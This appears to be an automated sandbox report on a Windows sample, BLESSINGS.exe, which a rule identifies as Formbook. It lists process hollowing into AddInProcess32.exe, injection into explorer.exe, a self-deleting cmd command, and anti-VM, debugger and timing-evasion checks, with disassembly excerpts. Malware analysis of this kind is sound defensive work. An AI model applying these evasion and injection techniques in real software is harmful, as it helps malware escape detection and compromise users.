          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@3/1
          Source: C:\Users\user\Desktop\BLESSINGS.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BLESSINGS.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_01
          Source: C:\Users\user\Desktop\BLESSINGS.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: BLESSINGS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\BLESSINGS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: BLESSINGS.exeVirustotal: Detection: 45%
          Source: BLESSINGS.exeReversingLabs: Detection: 15%
          Source: unknownProcess created: C:\Users\user\Desktop\BLESSINGS.exe 'C:\Users\user\Desktop\BLESSINGS.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: BLESSINGS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: BLESSINGS.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: BLESSINGS.exeStatic file information: File size 3427840 > 1048576
          Source: BLESSINGS.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x344200
          Source: BLESSINGS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, raserver.exe, 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000008.00000002.474933726.0000000000B62000.00000002.00020000.sdmp, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: RAServer.pdbGCTL source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_05454B71 push es; iretd 1_2_05455094
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_05450A2A push ds; ret 1_2_05450A51
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_054505E6 pushfd ; iretd 1_2_05450613
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_05454E9A push es; iretd 1_2_05455094
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041CEB5 push eax; ret 8_2_0041CF08
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041CF6C push eax; ret 8_2_0041CF72
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041CF02 push eax; ret 8_2_0041CF08
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041CF0B push eax; ret 8_2_0041CF72
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0178D0D1 push ecx; ret 8_2_0178D0E4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0457D0D1 push ecx; ret 15_2_0457D0E4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ED856 push esi; ret 15_2_001ED859
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ECEB5 push eax; ret 15_2_001ECF08
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ECF0B push eax; ret 15_2_001ECF72
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ECF02 push eax; ret 15_2_001ECF08
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ECF6C push eax; ret 15_2_001ECF72
          Source: C:\Users\user\Desktop\BLESSINGS.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Users\user\Desktop\BLESSINGS.exe File opened: C:\Users\user\Desktop\BLESSINGS.exe\:Zone.Identifier read attributes | delete
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE2
          Source: C:\Users\user\Desktop\BLESSINGS.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000001D98E4 second address: 00000000001D98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000001D9B5E second address: 00000000001D9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00409A90 rdtsc 8_2_00409A90
          Source: C:\Users\user\Desktop\BLESSINGS.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeWindow / User API: threadDelayed 401Jump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeWindow / User API: threadDelayed 9396Jump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 5100Thread sleep time: -12912720851596678s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 5100Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 972Thread sleep count: 401 > 30Jump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 972Thread sleep count: 9396 > 30Jump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 5100Thread sleep count: 53 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5336Thread sleep time: -54000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6660Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: explorer.exe, 0000000A.00000000.457745545.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000A.00000000.457496905.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vmware svga
          Source: explorer.exe, 0000000A.00000000.458586378.0000000008540000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA,
          Source: explorer.exe, 0000000A.00000000.450653153.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: tpautoconnsvc#Microsoft Hyper-V
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: cmd.txtQEMUqemu
          Source: explorer.exe, 0000000A.00000000.451742330.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000002.701264945.0000000006302000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vmsrvc
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
          Source: explorer.exe, 0000000A.00000000.450653153.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: virtual-vmware pointing device
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000A.00000000.457496905.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vmusrvc
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vmtools
          Source: explorer.exe, 0000000A.00000000.456554446.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: vboxservicevbox)Microsoft Virtual PC
          Source: explorer.exe, 0000000A.00000000.450653153.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000A.00000000.456554446.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000000A.00000000.457745545.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 0000000A.00000002.686806535.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 0000000A.00000000.450653153.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00409A90 rdtsc 8_2_00409A90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0040ACD0 LdrLoadDll,8_2_0040ACD0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173B171 mov eax, dword ptr fs:[00000030h]8_2_0173B171
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CB8D0 mov eax, dword ptr fs:[00000030h]8_2_017CB8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CB8D0 mov ecx, dword ptr fs:[00000030h]8_2_017CB8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CB8D0 mov eax, dword ptr fs:[00000030h]8_2_017CB8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CB8D0 mov eax, dword ptr fs:[00000030h]8_2_017CB8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CB8D0 mov eax, dword ptr fs:[00000030h]8_2_017CB8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CB8D0 mov eax, dword ptr fs:[00000030h]8_2_017CB8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176F0BF mov ecx, dword ptr fs:[00000030h]8_2_0176F0BF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176F0BF mov eax, dword ptr fs:[00000030h]8_2_0176F0BF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176F0BF mov eax, dword ptr fs:[00000030h]8_2_0176F0BF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017620A0 mov eax, dword ptr fs:[00000030h]8_2_017620A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017620A0 mov eax, dword ptr fs:[00000030h]8_2_017620A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017620A0 mov eax, dword ptr fs:[00000030h]8_2_017620A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017620A0 mov eax, dword ptr fs:[00000030h]8_2_017620A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017620A0 mov eax, dword ptr fs:[00000030h]8_2_017620A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017620A0 mov eax, dword ptr fs:[00000030h]8_2_017620A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017790AF mov eax, dword ptr fs:[00000030h]8_2_017790AF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739080 mov eax, dword ptr fs:[00000030h]8_2_01739080
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01801074 mov eax, dword ptr fs:[00000030h]8_2_01801074
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B3884 mov eax, dword ptr fs:[00000030h]8_2_017B3884
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B3884 mov eax, dword ptr fs:[00000030h]8_2_017B3884
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01763B7A mov eax, dword ptr fs:[00000030h]8_2_01763B7A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01763B7A mov eax, dword ptr fs:[00000030h]8_2_01763B7A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173DB60 mov ecx, dword ptr fs:[00000030h]8_2_0173DB60
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01805BA5 mov eax, dword ptr fs:[00000030h]8_2_01805BA5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173F358 mov eax, dword ptr fs:[00000030h]8_2_0173F358
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173DB40 mov eax, dword ptr fs:[00000030h]8_2_0173DB40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F131B mov eax, dword ptr fs:[00000030h]8_2_017F131B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017603E2 mov eax, dword ptr fs:[00000030h]8_2_017603E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017603E2 mov eax, dword ptr fs:[00000030h]8_2_017603E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017603E2 mov eax, dword ptr fs:[00000030h]8_2_017603E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017603E2 mov eax, dword ptr fs:[00000030h]8_2_017603E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017603E2 mov eax, dword ptr fs:[00000030h]8_2_017603E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017603E2 mov eax, dword ptr fs:[00000030h]8_2_017603E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175DBE9 mov eax, dword ptr fs:[00000030h]8_2_0175DBE9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B53CA mov eax, dword ptr fs:[00000030h]8_2_017B53CA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B53CA mov eax, dword ptr fs:[00000030h]8_2_017B53CA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01808B58 mov eax, dword ptr fs:[00000030h]8_2_01808B58
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01764BAD mov eax, dword ptr fs:[00000030h]8_2_01764BAD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01764BAD mov eax, dword ptr fs:[00000030h]8_2_01764BAD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01764BAD mov eax, dword ptr fs:[00000030h]8_2_01764BAD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762397 mov eax, dword ptr fs:[00000030h]8_2_01762397
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176B390 mov eax, dword ptr fs:[00000030h]8_2_0176B390
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F138A mov eax, dword ptr fs:[00000030h]8_2_017F138A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01741B8F mov eax, dword ptr fs:[00000030h]8_2_01741B8F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01741B8F mov eax, dword ptr fs:[00000030h]8_2_01741B8F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017ED380 mov ecx, dword ptr fs:[00000030h]8_2_017ED380
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0177927A mov eax, dword ptr fs:[00000030h]8_2_0177927A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017EB260 mov eax, dword ptr fs:[00000030h]8_2_017EB260
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017EB260 mov eax, dword ptr fs:[00000030h]8_2_017EB260
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FEA55 mov eax, dword ptr fs:[00000030h]8_2_017FEA55
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017C4257 mov eax, dword ptr fs:[00000030h]8_2_017C4257
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739240 mov eax, dword ptr fs:[00000030h]8_2_01739240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739240 mov eax, dword ptr fs:[00000030h]8_2_01739240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739240 mov eax, dword ptr fs:[00000030h]8_2_01739240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739240 mov eax, dword ptr fs:[00000030h]8_2_01739240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01774A2C mov eax, dword ptr fs:[00000030h]8_2_01774A2C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01774A2C mov eax, dword ptr fs:[00000030h]8_2_01774A2C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01735210 mov eax, dword ptr fs:[00000030h]8_2_01735210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01735210 mov ecx, dword ptr fs:[00000030h]8_2_01735210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01735210 mov eax, dword ptr fs:[00000030h]8_2_01735210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01735210 mov eax, dword ptr fs:[00000030h]8_2_01735210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173AA16 mov eax, dword ptr fs:[00000030h]8_2_0173AA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173AA16 mov eax, dword ptr fs:[00000030h]8_2_0173AA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01753A1C mov eax, dword ptr fs:[00000030h]8_2_01753A1C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FAA16 mov eax, dword ptr fs:[00000030h]8_2_017FAA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FAA16 mov eax, dword ptr fs:[00000030h]8_2_017FAA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01748A0A mov eax, dword ptr fs:[00000030h]8_2_01748A0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762AE4 mov eax, dword ptr fs:[00000030h]8_2_01762AE4
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762ACB mov eax, dword ptr fs:[00000030h]8_2_01762ACB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174AAB0 mov eax, dword ptr fs:[00000030h]8_2_0174AAB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174AAB0 mov eax, dword ptr fs:[00000030h]8_2_0174AAB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176FAB0 mov eax, dword ptr fs:[00000030h]8_2_0176FAB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017352A5 mov eax, dword ptr fs:[00000030h]8_2_017352A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017352A5 mov eax, dword ptr fs:[00000030h]8_2_017352A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017352A5 mov eax, dword ptr fs:[00000030h]8_2_017352A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017352A5 mov eax, dword ptr fs:[00000030h]8_2_017352A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017352A5 mov eax, dword ptr fs:[00000030h]8_2_017352A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176D294 mov eax, dword ptr fs:[00000030h]8_2_0176D294
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176D294 mov eax, dword ptr fs:[00000030h]8_2_0176D294
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01808A62 mov eax, dword ptr fs:[00000030h]8_2_01808A62
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175C577 mov eax, dword ptr fs:[00000030h]8_2_0175C577
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175C577 mov eax, dword ptr fs:[00000030h]8_2_0175C577
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01757D50 mov eax, dword ptr fs:[00000030h]8_2_01757D50
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_018005AC mov eax, dword ptr fs:[00000030h]8_2_018005AC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_018005AC mov eax, dword ptr fs:[00000030h]8_2_018005AC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01773D43 mov eax, dword ptr fs:[00000030h]8_2_01773D43
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B3540 mov eax, dword ptr fs:[00000030h]8_2_017B3540
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173AD30 mov eax, dword ptr fs:[00000030h]8_2_0173AD30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FE539 mov eax, dword ptr fs:[00000030h]8_2_017FE539
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017BA537 mov eax, dword ptr fs:[00000030h]8_2_017BA537
